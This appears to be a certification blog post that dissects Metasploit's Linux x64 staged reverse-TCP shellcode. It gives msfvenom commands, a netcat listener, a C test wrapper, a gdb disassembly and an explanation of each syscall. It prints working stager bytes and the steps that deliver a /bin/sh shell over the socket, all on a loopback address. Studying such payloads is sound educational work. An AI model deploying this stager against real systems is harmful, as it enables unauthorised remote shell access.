The linux/x64/shell/reverse_tcp staged shellcode generally consists of the following steps:
- Map 4096 bytes in process’ VAS memory
- Create and connect socket to remote address and port
- Wait for incoming data and save them into mapped memory
- Execute saved data
Shellcode demonstration
Create elf64 executable with msfvenom
$ msfvenom -p linux/x64/shell/reverse_tcp -f elf -a x64 --platform linux LHOST=127.1.1.2 LPORT=5555 -o staged_reverse_tcp
Set up nc listener with named pipe used as binary data transfer channel and run it in background. <> operator is read/write redirection.
$ mkfifo /tmp/fifo
$ nc -l 127.1.1.2 5555 <> /tmp/fifo &
Run the reverse shell stager which connects to nc listener
$ ./staged_reverse_tcp
Send execve /bin/sh shellcode back to the stager via named pipe
$ echo -ne "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05" > /tmp/fifo
The shellcode gets executed in the stager
$ ./staged_reverse_tcp
$ id
uid=1000(maple)...
Shellcode overview
Let’s generate the staged shellcode with msfvenom and output it in C format
$ msfvenom -p linux/x64/shell/reverse_tcp -f c -a x64 --platform linux LHOST=127.1.1.2 LPORT=5555
and insert it into C testing wrapper
// shellcode.c
// shellcode testing wrapper
#include<stdio.h>
#include<string.h>
// Stage-one payload: 129 bytes of x86-64 machine code (plus the implicit
// string terminator added by the string literal). Generated with:
// msfvenom -p linux/x64/shell/reverse_tcp -f c -a x64 --platform linux LHOST=127.1.1.2 LPORT=5555
// NOTE: the payload embeds NUL bytes ("\x02\x00" in the sockaddr constant
// and "\x6a\x00"), so string functions such as strlen() stop early on it;
// sizeof(code) - 1 gives the full payload length.
unsigned char code[] = \
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x52\x6a\x0a"
"\x41\x59\x56\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f"
"\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x15\xb3\x7f"
"\x01\x01\x02\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
"\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58"
"\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f"
"\x48\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x5a"
"\x0f\x05\x48\x85\xc0\x78\xef\xff\xe6";
/*
 * Test harness entry point: prints the size of the payload stored in
 * `code` and then transfers control to it.
 *
 * Returns 0 if the payload ever returns to the caller (the stager normally
 * either jumps into the received second stage or calls exit(1) itself).
 */
int main(void)
{
    /*
     * Use sizeof rather than strlen(): the payload contains embedded NUL
     * bytes, so strlen() would stop at the first one and under-report the
     * length. The "- 1" drops the terminator appended by the string literal.
     * size_t is unsigned, hence %zu.
     */
    printf("Shellcode Length: %zu\n", sizeof(code) - 1);

    /*
     * Treat the byte array as a function and call it. This only works when
     * the array's memory is executable (see the -z execstack build flag).
     */
    int (*CodeFun)(void) = (int (*)(void))code;
    CodeFun();

    return 0;
}
Compile it without buffer overflow stack protection and allow executable stack with -z flag which is passed to the linker
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
Now let’s disassemble the shellcode using gdb
$ gdb -q shellcode
(gdb) break *&code
(gdb) r
(gdb) disas
=> 0x0000000000601040 <+0>: xor rdi,rdi
   0x0000000000601043 <+3>: push 0x9
   0x0000000000601045 <+5>: pop rax
   0x0000000000601046 <+6>: cdq
   0x0000000000601047 <+7>: mov dh,0x10
   0x0000000000601049 <+9>: mov rsi,rdx
   0x000000000060104c <+12>: xor r9,r9
   0x000000000060104f <+15>: push 0x22
   0x0000000000601051 <+17>: pop r10
   0x0000000000601053 <+19>: mov dl,0x7
   0x0000000000601055 <+21>: syscall
   0x0000000000601057 <+23>: test rax,rax
   0x000000000060105a <+26>: js 0x6010ae
   0x000000000060105c <+28>: push 0xa
   0x000000000060105e <+30>: pop r9
   0x0000000000601060 <+32>: push rsi
   0x0000000000601061 <+33>: push rax
   0x0000000000601062 <+34>: push 0x29
   0x0000000000601064 <+36>: pop rax
   0x0000000000601065 <+37>: cdq
   0x0000000000601066 <+38>: push 0x2
   0x0000000000601068 <+40>: pop rdi
   0x0000000000601069 <+41>: push 0x1
   0x000000000060106b <+43>: pop rsi
   0x000000000060106c <+44>: syscall
   0x000000000060106e <+46>: test rax,rax
   0x0000000000601071 <+49>: js 0x6010ae
   0x0000000000601073 <+51>: xchg rdi,rax
   0x0000000000601075 <+53>: movabs rcx,0x201017fb3150002
   0x000000000060107f <+63>: push rcx
   0x0000000000601080 <+64>: mov rsi,rsp
   0x0000000000601083 <+67>: push 0x10
   0x0000000000601085 <+69>: pop rdx
   0x0000000000601086 <+70>: push 0x2a
   0x0000000000601088 <+72>: pop rax
   0x0000000000601089 <+73>: syscall
   0x000000000060108b <+75>: pop rcx
   0x000000000060108c <+76>: test rax,rax
   0x000000000060108f <+79>: jns 0x6010b6
   0x0000000000601091 <+81>: dec r9
   0x0000000000601094 <+84>: je 0x6010ae
   0x0000000000601096 <+86>: push rdi
   0x0000000000601097 <+87>: push 0x23
   0x0000000000601099 <+89>: pop rax
   0x000000000060109a <+90>: push 0x0
   0x000000000060109c <+92>: push 0x5
   0x000000000060109e <+94>: mov rdi,rsp
   0x00000000006010a1 <+97>: xor rsi,rsi
   0x00000000006010a4 <+100>: syscall
   0x00000000006010a6 <+102>: pop rcx
   0x00000000006010a7 <+103>: pop rcx
   0x00000000006010a8 <+104>: pop rdi
   0x00000000006010a9 <+105>: test rax,rax
   0x00000000006010ac <+108>: jns 0x601075
   0x00000000006010ae <+110>: push 0x3c
   0x00000000006010b0 <+112>: pop rax
   0x00000000006010b1 <+113>: push 0x1
   0x00000000006010b3 <+115>: pop rdi
   0x00000000006010b4 <+116>: syscall
   0x00000000006010b6 <+118>: pop rsi
   0x00000000006010b7 <+119>: pop rdx
   0x00000000006010b8 <+120>: syscall
   0x00000000006010ba <+122>: test rax,rax
   0x00000000006010bd <+125>: js 0x6010ae
   0x00000000006010bf <+127>: jmp rsi
We have 6 system calls in the shellcode so we analyze them in-depth one by one.
Map 4096 bytes in process’ VAS memory
<+0>: xor rdi, rdi ; RDI = 0 <+3>: push 0x9 <+5>: pop rax ; syscall number 9, void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset) <+6>: cdq ; zeroing RDX via sign extension <+7>: mov dh, 0x10 ; RDX = 0x1000 <+9>: mov rsi, rdx ; RSI = 0x1000, size_t length <+12>: xor r9, r9 ; R9 = 0, off_t offset <+15>: push 0x22 <+17>: pop r10 ; R10 = 0x22(34), int flags <+19>: mov dl, 0x7 ; RDX = 0x1007, int prot <+21>: syscall ; invoke system call mmap(0, 0x1000, 0x1007, 0x22, random_address, 0) ; strace: mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7feaab8ab000 <+23>: test rax, rax ; on success mmap() returns pointer to mapped area, on error -1 and SF flag is set <+26>: js 0x6010ae ; jump to exit() if SF == 1
mmap() system call is invoked which creates new VAS <-> Physical memory mapping. Starting address for new mapping is selected automatically by kernel if NULL is passed in *addr argument. 4096 bytes (1 page) is mapped. prot argument specifies that data in mapped pages can be read, written and executed. flags argument specifies that updates to the mapping are not visible to other processes mapping the same file and that the mapping is not backed by any file; its contents are initialized to zero. fd and offset arguments are ignored due to the MAP_ANONYMOUS flag set.
Return value from mmap() call is tested for the sign and if mmap() returns an error the program jumps to exit() call.
Create and connect socket to remote address and port
<+28>: push 0xa <+30>: pop r9 ; R9 = 0xa(10) <+32>: push rsi ; push 0x1000 <+33>: push rax ; push 0x00007ffff7ff6000, start address of mapped area <+34>: push 0x29 <+36>: pop rax ; syscall number 0x29(41), int socket(int domain, int type, int protocol) <+37>: cdq ; zeroing RDX via sign extension <+38>: push 0x2 <+40>: pop rdi ; RDI = 2 <+41>: push 0x1 <+43>: pop rsi ; RSI = 1 <+44>: syscall ; invoke system call socket(2, 1, 0) ; strace: socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 <+46>: test rax, rax ; on success socket() returns file descriptor, on error -1 and SF flag is set <+49>: js 0x6010ae ; jump to exit() if SF == 1 <+51>: xchg rdi, rax ; load file descriptor to RDI
This assembly stub creates endpoint for communication and returns new file descriptor for the socket. Protocol family which is used for communication is set to PF_INET which stands for IPv4 Internet protocols. type argument specifies communication semantics and is set to SOCK_STREAM which provides sequenced, reliable, two-way, connection-based byte streams. Returned file descriptor is saved into RDI for later use.
As with the previous assembly stub, this code tests the return value of the socket() call; if a negative error value is returned, the program jumps to the exit() stub.
<+53>: movabs rcx, 0x201017fb3150002 ; struct sockaddr -> sa_family=0x0002, sin_port=0xb315, sin_addr=0x201017f <+63>: push rcx <+64>: mov rsi, rsp ; RSI points to above constructed struct sockaddr <+67>: push 0x10 <+69>: pop rdx ; RDX = 0x10(16), socklen_t addrlen <+70>: push 0x2a <+72>: pop rax ; syscall number 0x2a(42), int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen) <+73>: syscall ; invoke system call connect(fd_num, const struct sockaddr *addr, socklen_t addrlen) ; strace: connect(3, {sa_family=AF_INET, sin_port=htons(5555), sin_addr=inet_addr("127.1.1.2")}, 16) = -1 <+75>: pop rcx ; save sockaddr struct to RCX <+76>: test rax, rax ; on success connect() returns 0 and ZF flag is set, on error -1 and SF flag is set <+79>: jns 0x6010b6 ; connect() was successful, jump to read() <+81>: dec r9 ; decrement R9 loop counter after unsuccessful connection <+84>: je 0x6010ae ; if R9 decremented to 0 then jump to exit() syscall <+86>: push rdi ; save fd_num to stack, popped back to RDI in <+104> <+87>: push 0x23 <+89>: pop rax ; syscall number 0x23(35), int nanosleep(const struct timespec *req, struct timespec *rem); <+90>: push 0x0 <+92>: push 0x5 <+94>: mov rdi, rsp ; RDI points to struct timespec *req, tv_sec = 5, tv_nsec = 0 <+97>: xor rsi, rsi ; RSI = 0, struct timespec *rem = 0 <+100>: syscall ; invoke system call nanosleep(const struct timespec *req, struct timespec *rem) <+102>: pop rcx ; RCX = 5 <+103>: pop rcx ; RCX = 0 <+104>: pop rdi ; RDI = 7 (fd_num) <+105>: test rax, rax ; test nanosleep() result <+108>: jns 0x601075 ; if nanosleep() successful then jump back to connect() syscall stub, if error continue to exit()
Above connect() implementation is slightly more complicated because it implements connection retry mechanism.
The code tries to connect to the provided IP address and port. If connect() returns an error, the R9 register is decremented by one and, unless it has reached zero, the program executes the nanosleep() syscall, which pauses it for 5 seconds. The connect() call is repeated after each successful nanosleep() execution. R9 is initialized to 10, so there are at most 10 connection attempts.
If connection succeeds the program jumps to read() stub.
Wait for incoming data and save them into mapped memory
<+118>: pop rsi ; RSI points to mmaped memory, void *buf argument in read() syscall <+119>: pop rdx ; RDX = 0x1000(4096), size_t count in read() syscall <+120>: syscall ; invoke system call read(int fd, void *buf, size_t count); RAX is set to 0 from connect() call <+122>: test rax, rax <+125>: js 0x6010ae ; on error jump to exit()
The read() call reads up to 4096 bytes from the socket and saves them into the previously mapped memory.
Execute saved data
<+127>: jmp rsi ; execute read bytes
RIP is loaded with the content of RSI, which points to the data just read, so the received bytes are executed.
Gracefully exit program
<+110>: push 0x3c <+112>: pop rax ; syscall number 60, void exit(int status) <+113>: push 0x1 <+115>: pop rdi ; RDI = 0x1, int status <+116>: syscall ; invoke system call void exit(1)
The linux/x64/shell/reverse_tcp payload has properly implemented graceful exit() mechanism. All of the return values are tested for errors and program flow jumps to the exit() stub if any error returned.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: SLAE64 – 1629